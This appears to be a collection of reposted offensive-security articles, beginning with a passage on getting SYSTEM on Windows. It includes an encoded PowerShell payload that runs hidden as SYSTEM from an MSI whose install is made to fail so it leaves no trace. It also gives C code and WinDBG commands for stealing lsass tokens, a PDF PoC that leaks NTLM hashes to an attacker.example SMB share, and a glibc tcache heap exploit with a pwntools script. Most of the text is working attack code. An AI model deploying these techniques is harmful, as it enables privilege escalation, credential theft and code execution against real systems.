EwAMAA0AGsAaABUAG4AZwAyADEANwA1ADAAaABmAFgAVgA5AC8AUQBoAEkAbwBUAHcATwA0AHMAMQAzAGkATwAvAEoAZQBhADYAdwB2AFMAZwBVADQARwBvAHYAYgBNAHMARgBDAFAAYgBYAHcANgB2AHkAWQBLAGMAZQA5ADgAcgBGAHYAUwBHAGgANgBIAGwALwBkAHQAaABmAGkAOABzAG0ARQB4AG4ARwAvADAAOQBkAFUAcQA5AHoAKwBIAEgAKwBqAGIAcgB2ADcALwA1AGgAOQBaAGYAbwBMAE8AVABTAHcASAA5AGEAKwBQAEgARgBmAHkATAAzAHQAdwBnAFkAWQBTAHIAQgAyAG8AUgBiAGgANQBGAGoARgAzAHkAWgBoADAAUQB0AEoAeAA4AFAAawBDAEIAUQBnAHAAcwA4ADgAVABmAGMAWABTAFQAUABlAC8AQgBKADgAVABmAEIATwBiAEwANgBRAGcAbwBBAEEAQQA9AD0AJwAnACkAKQA7AEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACQAcwAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7ACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA
</Property>
<CustomAction Id="SystemShell" Execute="deferred" Directory="TARGETDIR" ExeCommand='[cmdline]' Return="ignore" Impersonate="no"/>
<CustomAction Id="FailInstall" Execute="deferred" Script="vbscript" Return="check">
invalid vbs to fail install
</CustomAction>
<InstallExecuteSequence>
<Custom Action="SystemShell" After="InstallInitialize"></Custom>
<Custom Action="FailInstall" Before="InstallFiles"></Custom>
</InstallExecuteSequence>
</Product>
</Wix>

A lot of this is just boilerplate to generate a MSI, however the parts to note are our custom actions:

<Property Id="cmdline">powershell...</Property>
<CustomAction Id="SystemShell" Execute="deferred" Directory="TARGETDIR" ExeCommand='[cmdline]' Return="ignore" Impersonate="no"/>

This custom action is responsible for executing our provided cmdline as SYSTEM (note the Property tag, which is a nice way to get around the length limitation of the ExeCommand attribute for long Powershell commands).

Another useful trick is to ensure that the install fails after our command is executed, which stops the installer from adding a new entry to "Add or Remove Programs"; this is shown here by executing invalid VBScript:

<CustomAction Id="FailInstall" Execute="deferred" Script="vbscript" Return="check">
  invalid vbs to fail install
</CustomAction>

Finally, we have our InstallExecuteSequence tag, which is responsible for executing our custom actions in order:

<InstallExecuteSequence>
  <Custom Action="SystemShell" After="InstallInitialize"></Custom>
  <Custom Action="FailInstall" Before="InstallFiles"></Custom>
</InstallExecuteSequence>

So, when executed:

  1. Our first custom action will be launched, forcing our payload to run as the SYSTEM account.
  2. Our second custom action will be launched, causing some invalid VBScript to be executed and stop the install process with an error.

To compile this into a MSI we save the above contents as a file called «msigen.wix», and use the following commands:

candle.exe msigen.wix
light.exe msigen.wixobj

Finally, execute the MSI file to execute our payload as SYSTEM:


PROC_THREAD_ATTRIBUTE_PARENT_PROCESS method

This method of becoming SYSTEM was actually revealed to me via James Forshaw's walkthrough of how to become "Trusted Installer".

Again, if you listen to my ramblings on Twitter, I recently mentioned this technique a few weeks back:

How this technique works is by leveraging the CreateProcess Win32 API call, and using its support for assigning the parent of a newly spawned process via the PROC_THREAD_ATTRIBUTE_PARENT_PROCESS attribute.

If we review the documentation of this setting, we see the following:

PROC_THREAD_ATTRIBUTE_PARENT_PROCESS

So, this means if we set the parent process of our newly spawned process, we will inherit the process token. This gives us a cool way to grab the SYSTEM account via the process token.

We can create a new process and set the parent with the following code:

#include <windows.h>
#include <stdio.h>

int pid;
HANDLE pHandle = NULL;
STARTUPINFOEXA si;
PROCESS_INFORMATION pi;
SIZE_T size;
BOOL ret;

// Set the PID to a SYSTEM process PID
pid = 555;

EnableDebugPriv();   // helper from the accompanying tool (not shown here): enables SeDebugPrivilege so OpenProcess can succeed against a SYSTEM process

// Open the process which we will inherit the handle from
if ((pHandle = OpenProcess(PROCESS_ALL_ACCESS, false, pid)) == 0) {
	printf("Error opening PID %d\n", pid);
	return 2;
}

// Create our PROC_THREAD_ATTRIBUTE_PARENT_PROCESS attribute
ZeroMemory(&si, sizeof(STARTUPINFOEXA));

InitializeProcThreadAttributeList(NULL, 1, 0, &size);
si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(
	GetProcessHeap(),
	0,
	size
);
InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &size);
UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &pHandle, sizeof(HANDLE), NULL, NULL);

si.StartupInfo.cb = sizeof(STARTUPINFOEXA);

// Finally, create the process
ret = CreateProcessA(
	"C:\\Windows\\system32\\cmd.exe", 
	NULL,
	NULL, 
	NULL, 
	true, 
	EXTENDED_STARTUPINFO_PRESENT | CREATE_NEW_CONSOLE, 
	NULL,
	NULL, 
	reinterpret_cast<LPSTARTUPINFOA>(&si), 
	&pi
);

if (ret == false) {
	printf("Error creating new process (%d)\n", GetLastError());
	return 3;
}

When compiled, we see that we can launch a process and inherit an access token from a parent process running as SYSTEM such as lsass.exe:


The source for this technique can be found here.

Alternatively, NtObjectManager provides a nice easy way to achieve this using Powershell:

New-Win32Process cmd.exe -CreationFlags Newconsole -ParentProcess (Get-NtProcess -Name lsass.exe)

Bonus Round: Getting SYSTEM via the Kernel

OK, so this technique is just a bit of fun, and not something that you are likely to come across in an engagement… but it goes some way to show just how Windows is actually managing process tokens.

Often you will see Windows kernel privilege escalation exploits tamper with a process structure in the kernel address space, with the aim of updating a process token. For example, in the popular MS15-010 privilege escalation exploit (found on exploit-db here), we can see a number of references to manipulating access tokens.

For this analysis, we will be using WinDBG on a Windows 7 x64 virtual machine in which we will be looking to elevate the privileges of our cmd.exe process to SYSTEM by manipulating kernel structures. (I won’t go through how to set up the Kernel debugger connection as this is covered in multiple places for multiple hypervisors.)

Once you have WinDBG connected, we first need to gather information on our running process which we want to elevate to SYSTEM. This can be done using the !process command:

!process 0 0 cmd.exe

Returned we can see some important information about our process, such as the number of open handles, and the process environment block address:

PROCESS fffffa8002edd580
    SessionId: 1  Cid: 0858    Peb: 7fffffd4000  ParentCid: 0578
    DirBase: 09d37000  ObjectTable: fffff8a0012b8ca0  HandleCount:  21.
    Image: cmd.exe

For our purpose, we are interested in the provided PROCESS address (in this example fffffa8002edd580), which is actually a pointer to an EPROCESS structure. The EPROCESS structure (documented by Microsoft here) holds important information about a process, such as the process ID and references to the process threads.

Amongst the many fields in this structure is a pointer to the process’s access token, defined in a TOKEN structure. To view the contents of the token, we first must calculate the TOKEN address. On Windows 7 x64, the process TOKEN is located at offset 0x208, which differs throughout each version (and potentially service pack) of Windows. We can retrieve the pointer with the following command:

kd> dq fffffa8002edd580+0x208 L1

This returns the token address as follows:

fffffa80`02edd788  fffff8a0`00d76c51

As the token address is referenced within a EX_FAST_REF structure, we must AND the value to gain the true pointer address:

kd> ? fffff8a0`00d76c51 & ffffffff`fffffff0

Evaluate expression: -8108884136880 = fffff8a0`00d76c50

Which means that our true TOKEN address for cmd.exe is at fffff8a000d76c50. Next we can dump out the TOKEN structure members for our process using the following command:

kd> !token fffff8a0`00d76c50

This gives us an idea of the information held by the process token:

User: S-1-5-21-3262056927-4167910718-262487826-1001
User Groups:
 00 S-1-5-21-3262056927-4167910718-262487826-513
    Attributes - Mandatory Default Enabled
 01 S-1-1-0
    Attributes - Mandatory Default Enabled
 02 S-1-5-32-544
    Attributes - DenyOnly
 03 S-1-5-32-545
    Attributes - Mandatory Default Enabled
 04 S-1-5-4
    Attributes - Mandatory Default Enabled
 05 S-1-2-1
    Attributes - Mandatory Default Enabled
 06 S-1-5-11
    Attributes - Mandatory Default Enabled
 07 S-1-5-15
    Attributes - Mandatory Default Enabled
 08 S-1-5-5-0-2917477
    Attributes - Mandatory Default Enabled LogonId
 09 S-1-2-0
    Attributes - Mandatory Default Enabled
 10 S-1-5-64-10
    Attributes - Mandatory Default Enabled
 11 S-1-16-8192
    Attributes - GroupIntegrity GroupIntegrityEnabled
Primary Group: S-1-5-21-3262056927-4167910718-262487826-513
Privs:
 19 0x000000013 SeShutdownPrivilege               Attributes -
 23 0x000000017 SeChangeNotifyPrivilege           Attributes - Enabled Default
 25 0x000000019 SeUndockPrivilege                 Attributes -
 33 0x000000021 SeIncreaseWorkingSetPrivilege     Attributes -
 34 0x000000022 SeTimeZonePrivilege               Attributes -

So how do we escalate our process to gain SYSTEM access? Well we just steal the token from another SYSTEM privileged process, such as lsass.exe, and splice this into our cmd.exe EPROCESS using the following:

kd> !process 0 0 lsass.exe
kd> dq <LSASS_PROCESS_ADDRESS>+0x208 L1
kd> ? <LSASS_TOKEN_ADDRESS> & FFFFFFFF`FFFFFFF0
kd> !process 0 0 cmd.exe
kd> eq <CMD_EPROCESS_ADDRESS+0x208> <LSASS_TOKEN_ADDRESS>

To see what this looks like when run against a live system, I’ll leave you with a quick demo showing cmd.exe being elevated from a low level user, to SYSTEM privileges:

NTLM Credentials Theft via PDF Files

( Original text by research.checkpoint.com )

Just a few days after it was reported that malicious actors can exploit a vulnerability in MS outlook using OLE to steal a Windows user’s NTLM hashes, the Check Point research team can also reveal that NTLM hash leaks can also be achieved via PDF files with no user interaction or exploitation.

According to Check Point researchers, rather than exploiting the vulnerability in Microsoft Word files or Outlook’s handling of RTF files, attackers take advantage of a feature that allows embedding remote documents and files inside a PDF file. The attacker can then use this to inject malicious content into a PDF and so when that PDF is opened, the target automatically leaks credentials in the form of NTLM hashes.

PDF Background

A PDF file consists primarily of objects, together with Document structure, File structure, and content streams. There are eight basic types of objects:

  • Boolean values
  • Integers and real numbers
  • Strings
  • Names
  • Arrays
  • Streams
  • The null object
  • Dictionaries

A dictionary object is a table containing pairs of objects, called entries.  The first element of each entry is the key and the second element is the value. The key must be a name, and the value may be any kind of object, including another dictionary. The pages of a document are represented by dictionary objects called page objects.  The page objects consist of several required and optional entries.

Proof of Concept

The /AA entry is an optional entry defining actions to be performed when a page is opened (/O entry) or closed (/C entry).  The /O (/C) entry holds an action dictionary. The action dictionary consists of 3 required entries: /S, /F, and /D:

  • /S entry: Describes the type of action to be performed. The GoTo action changes the view to a specified destination within the document. The action types GoToR, (Go To Remote) and GoToE (Go To Embedded), both vulnerable, jump to destinations in another PDF file.
  • /F entry: Exists in GoToR and GoToE, and has slightly different meanings for each. In both cases it describes the location of the other PDF. Its type is file specification.
  • /D entry: Describes the location to go to within the document.

By injecting a malicious entry (using the fields described above together with his SMB server details via the “/F” key), an attacker can entice arbitrary targets to open the crafted PDF file which then automatically leaks their NTLM hash, challenge, user, host name and domain details.
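As a rough illustration (the object numbers and the SMB host below are invented for the example, not taken from the original PoC), such an injected page object could look something like this:

1 0 obj
<< /Type /Page
   /Parent 2 0 R
   /AA << /O << /S /GoToE
                /F (\\\\attacker.example\\share\\x.pdf)
                /D [ 0 /Fit ]
             >>
      >>
>>
endobj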

Figure 1: PoC – Injected GoToE action.

In addition, from the target’s perspective there is no evidence or any security alert of the attacker’s activity, which makes it impossible to notice abnormal behavior.

Figure 2: The crafted PDF file has no evidence of the attacker’s actions.

The NTLM details are leaked through the SMB traffic and sent to the attacker’s server which can be further used to cause various SMB relay attacks.

Figure 3: The Leaked NTLM details after the crafted PDF is opened.

 

Affected Products and Mitigation

Our investigation led us to conclude that all Windows PDF-viewers are vulnerable to this security flaw and will reveal the NTLM credentials.

Disclosure

The issue was disclosed both to Adobe and Foxit.

Foxit indeed fixed the issue as part of 9.1 release.

Adobe fixed the vulnerability as part of the Adobe Reader version released in May (CVE-2018-4993).

IPS Prevention

Check Point customers are protected by the IPS protection:

Multiple PDF readers NTLMv2 Credential Theft

We would also like to thank our colleagues, Assaf Baharav, Yaron Fruchtmann, and Ido Solomon for their help in this research.

Children Tcache: a one-NULL-byte buffer overflow on the heap

( Original text by  )

This article is intended for the people who already have some knowledge about heap exploitation. If you already know some heap attacks on glibc<2.26 it’ll be fully understandable to you. But if you don’t, don’t worry — I’ve tried to make this post approachable for everyone with just basic knowledge. If you really know nothing about the topic, I recommend heap-exploitation.

Tcache is an internal mechanism responsible for heap management. It was introduced in glibc 2.26 in 2017. Its objective is to speed up heap management. The older algorithms were not removed and are still used in some cases, for example for bigger chunks or when the appropriate tcache bin is full. But heap exploitation with this mechanism is a lot easier due to the lack of heap integrity checks.

The convention used in this post is that the pointer to the next chunk is called fd and the pointer to the previous chunk bk, as they are called in a normal heap chunk.

Tcache overview

You can grab glibc 2.26 from here. All the source code we are interested in is located in the file malloc/malloc.c.

In this version of glibc two new functions were created:

static void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
  assert (tc_idx < TCACHE_MAX_BINS);
  e->next = tcache->entries[tc_idx];
  tcache->entries[tc_idx] = e;
  ++(tcache->counts[tc_idx]);
}

static void *
tcache_get (size_t tc_idx)
{
  tcache_entry *e = tcache->entries[tc_idx];
  assert (tc_idx < TCACHE_MAX_BINS);
  assert (tcache->entries[tc_idx] > 0);
  tcache->entries[tc_idx] = e->next;
  --(tcache->counts[tc_idx]);
  return (void *) e;
}

Both of these functions can be called at the beginning of the _int_free and __libc_malloc functions. tcache_put is called when the requested size of the allocated region is not greater than 0x408 and the tcache bin appropriate for the given size is not full. The maximum number of chunks in one tcache bin is mp_.tcache_count, and this variable is set to 7 by default. This variable is set here and its root is the following piece of code:

/* This is another arbitrary limit, which tunables can change.  Each
   tcache bin will hold at most this number of chunks.  */
# define TCACHE_FILL_COUNT 7
#endif

tcache_get is called when we request a chunk of the size of a tcache bin and the appropriate bin contains some chunks. Every tcache bin contains chunks of only one size. From the code above we can see that it is a singly linked list, similar to a fastbin: it contains only a pointer to the next chunk. Also, the list is LIFO, like in fastbins. But there is a difference: each tcache bin remembers how many chunks belong to it in the variable tcache->counts[tc_idx].
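Both entries and counts live in a small per-thread structure. In the same malloc.c (comments trimmed) it looks roughly like this, with TCACHE_MAX_BINS defined as 64:

typedef struct tcache_entry
{
  struct tcache_entry *next;
} tcache_entry;

typedef struct tcache_perthread_struct
{
  char counts[TCACHE_MAX_BINS];
  tcache_entry *entries[TCACHE_MAX_BINS];
} tcache_perthread_struct;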

What’s strange is that calloc doesn’t allocate from tcache bins.

If you want to test how tcache behaves, you can use pwndbg and compile malloc_playground.

a@x:~/Desktop/how2heap_mycp$ gdb -q ./mp
pwndbg: loaded 170 commands. Type pwndbg [filter] for a list.
pwndbg: created $rebase, $ida gdb functions (can be used with print/break)


Reading symbols from ./mp...(no debugging symbols found)...done.
pwndbg> r
Starting program: /home/a/Desktop/how2heap_mycp/mp 
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
> malloc 0x50
==> 0x555555559670
> malloc 0x50
==> 0x5555555596d0
> malloc 0x61
==> 0x555555559730
> free 0x555555559670
==> ok
> free 0x5555555596d0
==> ok
> free 0x555555559730
==> ok
> ^C
Program received signal SIGINT, Interrupt.
[...]
pwndbg> bins
tcachebins
0x60 [  2]: 0x5555555596d0 —▸ 0x555555559670 ◂— 0x0
0x70 [  1]: 0x555555559730 ◂— 0x0
fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
unsortedbin
all: 0x0
smallbins
empty
largebins
empty
pwndbg> 

Tcache attacks

Due to a lack of integrity checks in tcache, many attacks are easier.

double free

Let’s consider a double free vulnerability as a first example:

#include <stdlib.h>
#include <stdio.h>

int main()
{
	char *a = malloc(0x38);
	free(a);
	free(a);
	printf("%p\n", malloc(0x38));
	printf("%p\n", malloc(0x38));
} 

As a result, we get the same pointer two times.

On older glibc (<2.26), getting the same result is a bit more complicated:

#include <stdlib.h>
#include <stdio.h>

int main()
{
	printf("%s","hello\n");
	char *a = malloc(0x38);
	char *b = malloc(0x38);
	free(a);
	free(b);
	free(a);
	printf("%p\n", malloc(0x38));
	printf("%p\n", malloc(0x38));
	printf("%p\n", malloc(0x38));
} 

output:

hello
0x602420
0x602460
0x602420

We additionally need to free another chunk in between due to this integrity check: we cannot add a new chunk to a fastbin list when the same chunk is already on top. printf is called at the beginning because the program crashes otherwise. This is probably because when printf is called for the first time it initializes its buffer by mallocing some memory.

House of Spirit

House of Spirit is also super easy:

#include <stdlib.h>
#include <stdio.h>

int main()
{
	long int var[10];
	var[1] = 0x40; // set the size of the chunk to 0x40

	free(&var[2]);
	char *a=malloc(0x38);
	printf("%p %p\n",a ,&var[2]);
}

output:

0x7fff899700c0 0x7fff899700c0

By freeing a never-allocated region we put it on a tcache bin list. We can then obtain this region when malloc is called with the appropriate size as an argument. This is useful when we have the ability to overwrite some pointer via a buffer overflow.

In older glibc we needed to put in more effort due to this integrity check: we had to create another fake chunk after the freed one, like here.

tcache/fastbin poisoning

If we want to exploit malloc to return a pointer to a controlled location we can simply overwrite a pointer to a next chunk. We can forget about this integrity check in older mechanism:

#include <stdlib.h>
#include <stdio.h>

char var[]="aaaaaaaaaaaaaaa";

int main()
{
	long *a = malloc(0x38);
	long *b = malloc(0x38);
	free(a);
	free(b);
	// tcache bin 0x38 contains: b -> a 
	b[0] = (long)&var; // overwrite the next pointer (the cast avoids the pointer-to-integer warning)
	// tcache bin 0x38 contains: b -> var
	malloc(0x38);
	// tcache bin 0x38 contains: var
	char *c=malloc(0x38);
	printf("%s\n",c);
}

output:

aaaaaaaaaaaaaaa

We cannot do this by freeing only one chunk because each tcache bin remembers how many chunks belong to it.

libc leak

If we want to leak the libc address on glibc 2.26 we can do this:

#include <stdlib.h>
#include <stdio.h>

int main()
{
	long *a = malloc(0x1000);
	malloc(0x10);
	free(a);
	printf("%p\n",a[0]);
}  

This program prints the fd of a chunk inside the unsorted bin. The fd of the last chunk and the bk of the first chunk in the unsorted bin are set to a pointer into libc.

If we can only request mallocs of at most 0x100 bytes this won’t work, because the freed chunk won’t go to the unsorted bin list but to a tcache bin. It works only with older glibc:

#include <stdlib.h>
#include <stdio.h>

int main(int argc , char* argv[])
{
	long *a=malloc(0x100);
	long *b=malloc(0x10);
	free(a);
	printf("%p\n",a[0]);
}

Luckily, if we make the tcache bin full (max capacity is 7 chunks), the deallocated chunk will be put in the unsorted bin:

#include <stdlib.h>
#include <stdio.h>

int main(int argc , char* argv[])
{
	long* t[7];
	long *a=malloc(0x100);
	long *b=malloc(0x10);
	
	// make tcache bin full
	for(int i=0;i<7;i++)
		t[i]=malloc(0x100);
	for(int i=0;i<7;i++)
		free(t[i]);
	
	free(a);
	// a is put in an unsorted bin because the tcache bin of this size is full
	printf("%p\n",a[0]);
} 

tcache attacks summary

More attacks exist for glibc with tcache. For example, House of Force works in the same way as previously. Also, it’s easy to make overlapping chunks by overwriting a size field with a bigger value. Since tcache was introduced, heap exploitation has become much easier. The exception is a buffer overflow by a single NULL byte, like in the Children Tcache CTF task. I used an old attack with chunks of smallbin size and prevented them from going into the tcache by making the tcache bins full.

Children Tcache overview

In this task we have 2 binaries: task and libc

The version of libc is 2.27 but there is no difference between 2.26 and 2.27 for us:

a@x:~/Desktop/children_tcache$ strings libc.so.6 | grep LIBC
[...]
GNU C Library (Ubuntu GLIBC 2.27-3ubuntu1) stable release version 2.27.

The decompiled binary looks like this:

unsigned __int64 new_heap()
{
  signed int i; // [rsp+Ch] [rbp-2034h]
  char *ptr; // [rsp+10h] [rbp-2030h]
  unsigned __int64 size; // [rsp+18h] [rbp-2028h]
  char s; // [rsp+20h] [rbp-2020h]
  unsigned __int64 v5; // [rsp+2038h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  memset(&s, 0, 0x2010uLL);
  for ( i = 0; ; ++i )
  {
    if ( i > 9 )
    {
      puts(":(");
      return __readfsqword(0x28u) ^ v5;
    }
    if ( !pointers[i] )
      break;
  }
  printf("Size:");
  size = read_atoll();
  if ( size > 0x2000 )
    exit(-2);
  ptr = (char *)malloc(size);
  if ( !ptr )
    exit(-1);
  printf("Data:");
  read_data((__int64)&s, size);
  strcpy(ptr, &s);
  pointers[i] = ptr;
  sizes[i] = size;
  return __readfsqword(0x28u) ^ v5;
}

int show_heap()
{
  const char *v0; // rax
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]

  printf("Index:");
  v2 = read_atoll();
  if ( v2 > 9 )
    exit(-3);
  v0 = pointers[v2];
  if ( v0 )
    LODWORD(v0) = puts(pointers[v2]);
  return (signed int)v0;
}

int delete_heap()
{
  unsigned __int64 v1; // [rsp+8h] [rbp-8h]

  printf("Index:");
  v1 = read_atoll();
  if ( v1 > 9 )
    exit(-3);
  if ( pointers[v1] )
  {
    memset((void *)pointers[v1], 0xDA, sizes[v1]);
    free((void *)pointers[v1]);
    pointers[v1] = 0LL;
    sizes[v1] = 0LL;
  }
  return puts(":)");
}

TL;DR:

We can

  • create chunk on the heap and read data into it
  • delete a chunk
  • print data in a chunk

Everything is fine except the new_heap function, which is vulnerable to a single-NULL-byte buffer overflow: read_data reads the user’s data into a stack buffer and strcpy then copies it, plus a terminating NULL byte, into the size-byte heap chunk, so a full-length input overflows the chunk by one NULL byte. Before free, the area is filled with the 0xDA byte. We can have at most 10 chunks allocated at the same time and the maximum requested size of a chunk is 0x2000.

In older versions of glibc the following attack works:

#include<stdlib.h>
#include<stdio.h>
 
int main()
{
    // allocate 3 chunks
    char *a = malloc(0x108);
    char *b = malloc(0xf8);
    char *c = malloc(0xf8);

    printf("a: %p\n",a);
    printf("b: %p\n",b); 

    free(a);
    
    // buffer overflow b by 1 NULL byte
    b[0xf8] = '\x00'; //clear prev in use of c
    *(long*)(b+0xf0) = 0x210; //We can set prev_size of c to 0x210 bytes
    
    // c has prev_in_use=0 and prev_size=0x210 so it will consolidate
    // with a and b and it will be put in the unsorted bin
    free(c);

    // now we can allocate chunks from the area of  a|b|c
    char *A = malloc(0x108);
    char *B = malloc(0xF8);
    printf("A: %p\n",A); 
    printf("B: %p\n",B);

    free(b);
    // leak libc
    printf("B content: %p\n",((long*)B)[0]);
}

output:

a: 0x602010
b: 0x602120
A: 0x602010
B: 0x602120
B content: 0x7ffff7dd1b78

Normally, when we free a chunk of smallbin size, there is a check whether its neighbour is freed. If so, it will consolidate with it. When we free chunk c it consolidates with a and b for 2 reasons:

  • We have cleared the PREV_INUSE bit of chunk c so it thinks that its previous neighbour is freed.
  • We have set prev_size of chunk c to value 0x210 which is a total size of chunks a and b.

This attack can be shorter:

#include<stdlib.h>
#include<stdio.h>
 
int main()
{
    // allocate 3 chunks
    char *a = malloc(0x108);
    char *b = malloc(0xf8);
    char *c = malloc(0xf8);

    printf("a: %p\n",a);
    printf("b: %p\n",b); 

    free(a);
    
    // buffer overflow b by 1 NULL byte
    b[0xf8] = '\x00'; //clear prev in use of c
    *(long*)(b+0xf0) = 0x210; //We can set prev_size of c to 0x210 bytes
    
    // c has prev_in_use=0 and prev_size=0x210 so it will consolidate
    // with a and b and it will be put in the unsorted bin
    free(c);

    // now we can allocate chunks from the area of a|b|c
    char *A = malloc(0x108);
    printf("A: %p\n",A); 

    // leak libc
    printf("B content: %p\n",((long*)b)[0]);
}

output:

a: 0x602010
b: 0x602120
A: 0x602010
B content: 0x7ffff7dd1b78

In the end, we skipped the allocation and deletion of the B chunk because it is not needed. After c is freed, we have one unsorted bin chunk that spans the areas of a, b and c. After we allocate chunk A, the unsorted bin chunk splits into 2 parts: one part is returned by malloc, the other part remains in the unsorted bin and begins at the same place as b.

In our examples, the first allocated chunk has a different size (0x108) than the others. The example would also work with 0xf8, but in this challenge strcpy is used, which stops on a NULL byte, so we couldn’t write the prev_size value 0x200 (its lowest byte is 0x00, and strcpy would stop there). With a size equal to 0x108 we can overwrite prev_size with 0x210.

We can accomplish the same attack on a newer libc by using the same algorithm. But there is one difference: before freeing chunks we need to make the tcache bins full. The attack below does the same leak as the previous one but also goes further. After the leak, it causes a double free, because B and b point to the same chunk of size 0x1f8. Later, a tcache poisoning attack is performed.

#include<stdlib.h>
#include<stdio.h>
 
char* tcache1[7]; 
char* tcache2[7]; 
 
long var;
 
int main()
{
    char *a = malloc(0x108);
    char *b = malloc(0xf8);
    char *c = malloc(0xf8);
	

    printf("a: %p\n",a);
    printf("b: %p\n",b); 
    printf("c: %p\n",c);

    // make 0xf8 tcache full
    for(int i=0;i<7;i++)
        tcache1[i]=malloc(0xF8);
    for(int i=0;i<7;i++)
        free(tcache1[i]);

    // make 0x108 tcache full
    for(int i=0;i<7;i++)
        tcache2[i]=malloc(0x108);
    for(int i=0;i<7;i++)
        free(tcache2[i]);

    free(a); // a goes to an unsorted bin

    tcache1[0]=malloc(0xF8);//creates one free place in 0xf8 tcache 
    // b will go to tcache after free(). 

    // in the CTF task we can only write data to chunks
    // right after mallocing this chunk
    free(b);
    b = malloc(0xf8);
    // buffer overflow b by 1 NULL byte
    b[0xf8] = '\x00'; //clear prev in use of c
    *(long*)(b+0xf0) = 0x210; //We can set prev_size of c to 0x210 bytes
    printf("b: %p\n",b);
   
    // make 0xf8 tcache full
    free(tcache1[0]);

    // c has prev_in_use=0 and prev_size=0x210 so it will consolidate
    // with a and b and it will be put in the unsorted bin
    free(c);
    
    // make 0x108 tcache empty
    for(int i=0;i<7;i++)
        tcache2[i]=malloc(0x108);


    // now we can allocate chunks from the area of a|b|c
    char *A = malloc(0x108);
    printf("A: %p\n",A);

    // leak libc
    printf("b content: %p\n",((long*)b)[0]);

    // make 0x108 tcache full because we can have max 10 chunks allocated 
    for(int i=0;i<7;i++)
        free(tcache2[i]);

    // Both 0xf8 and 0x108 tcache bins are full

    // let's allocate chunk that overlaps b.
    char *B = malloc(0x1F8);
    printf("B: %p\n",B);

    // now, chunks B and b are allocated and have the same address. 
    // now we can use double free and tcache poisoning attack

    // double free
    free(B);
    free(b);
    // now the 0x1F8 tcache bin contains the same chunk twice

    // allocate one of them and set next pointer to known address
    b = malloc(0x1F8);
    *(long*)(b) = (long)&var; // overwrite the next pointer with the address of var
    
    malloc(0x1F8);
	
    // the allocated chunk will have an address of variable var
    char *super_pointer = malloc(0x1F8);
	
    printf("%p %p\n",super_pointer,&var);
}

output:

a: 0x55c054fa2260
b: 0x55c054fa2370
c: 0x55c054fa2470
b: 0x55c054fa2370
A: 0x55c054fa2260
b content: 0x7f60c1026ca0
B: 0x55c054fa2370
0x55c053972060 0x55c053972060

And the last step is to implement the exploit in Python. It does the same thing as the previous code, except that malloc returns to us a region at &__free_hook. Then we overwrite __free_hook with a one-gadget RCE address. Finally, free is called to trigger it.

from pwn import *

r = remote("localhost", 1337)
#r = remote("54.178.132.125",8763)
pointers = [False]*10

def menu():
    print r.recvuntil("choice: ") 

def new_heap(size, data):
    #find idx
    global pointers
    idx = None
    for i in range(10):
        if not pointers[i]:
            pointers[i] = True
            idx = i
            break
    assert(idx is not None)
	
    r.send("1")
    print r.recvuntil("Size:")
    r.send(str(size))
    print r.recvuntil("Data:")
    r.send(data)
    menu()
    return idx
	
def show_heap(idx):
    r.send("2")
    print r.recvuntil("Index:")
    r.send(str(idx))
    menu()
	
def show_heap_leak(idx):
    r.send("2")
    print r.recvuntil("Index:")
    r.send(str(idx))
    data = r.recvuntil("choice: ")
    addr = data.split("\n")[0]
    addr = addr.ljust(8,"\x00")
    return u64(addr)
	
	
def delete_heap(idx):
    global pointers
    assert (pointers[idx]==True)
    pointers[idx]=False
	
    r.send("3")
    print r.recvuntil("Index:")
    r.send(str(idx))
    menu()
    return None
	
def delete_heap_and_shell(idx):
    global pointers
    assert (pointers[idx]==True)
    pointers[idx]=False
	
    r.send("3")
    print r.recvuntil("Index:")
    r.send(str(idx))
    r.interactive()

tcache1 = [None]*10
tcache2 = [None]*10
	
menu()
a = new_heap(0x108,"a"*10)
b = new_heap(0xf8,"b"*10)
c = new_heap(0xf8,"c"*10)

# make 0xf8 tcache full
for i in range(7):
    tcache1[i] = new_heap(0xF8, "sss"+str(i))
for i in range(7):
    tcache1[i] = delete_heap(tcache1[i])

# make 0x108 tcache full 
for i in range(7):
    tcache2[i] = new_heap(0x108, "sss"+str(i))
for i in range(7):
    tcache2[i] = delete_heap(tcache2[i])

a = delete_heap(a) #a goes to an unsorted bin

tcache1[0] = new_heap(0xF8, "sss0") #create one free place in 0xf8 tcache

# buffer overflow by 1 NULL byte
b = delete_heap(b);
b = new_heap(0xf8,"b"*0xf8) #clear prev in use of c

# Clear prev_size
# This is tricky because data is copied into the chunk by strcpy, which
# stops copying on a NULL byte.
# If we want to clear a region we need to free and allocate several
# chunks, each one byte smaller than the previous one.
for i in range(0xf8, 0xf3, -1):
    b = delete_heap(b);
    b = new_heap(i-1,(i-1)*"b")

